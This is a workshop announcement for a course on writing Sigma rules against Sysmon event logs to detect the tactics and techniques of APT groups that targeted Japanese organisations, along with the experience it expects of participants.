Detection engineering with Sigma: Defend against APT targeting Japan
In this workshop, participants will learn how to detect APT attacks, using some of the reported cases in the past one year in which Japanese companies and organizations were targeted. The participants will not attempt to detect “less painful” IoCs defined in Pyramid of Pain, such as file hash values and communication destinations, which are commonly referred to. Instead, the participants will focus on TTPs in higher level, which are harder for attackers to modify.
Each participant in the workshop will create their own Sigma rules to detect TTPs used by each actor. No prior experience is required, as we will explain how to create rules as well as how to use the tools necessary bare minimum during the workshop. However, participants with experience in creating detection logic for EDR products or malware analysis can try out more advanced tasks.
In the exercise, participants will repeat the trial-and-error process using the prepared logs, checking whether their rules can correctly detect the attacks without false positive or false negative. The rules for the example answer as well as the reason why we created such rules will later be explained. The participants will apply Sigma rules to the event logs obtained with Sysmon, which can be converted to detection rules for various security products. We hope each participant can use them at their company’s environment as well after this workshop.
Through this workshop, participants will learn how to use Sigma in security monitoring and incident response, as well as what analysts should focus on during incident response.
- A Windows PC that can be connected to the Internet
The participants are required to install the following tools in advance
It is not required but ideal for the participants to have the following experiences
- Incident response and malware analysis
- Creating rules for EDR products and Sigma rules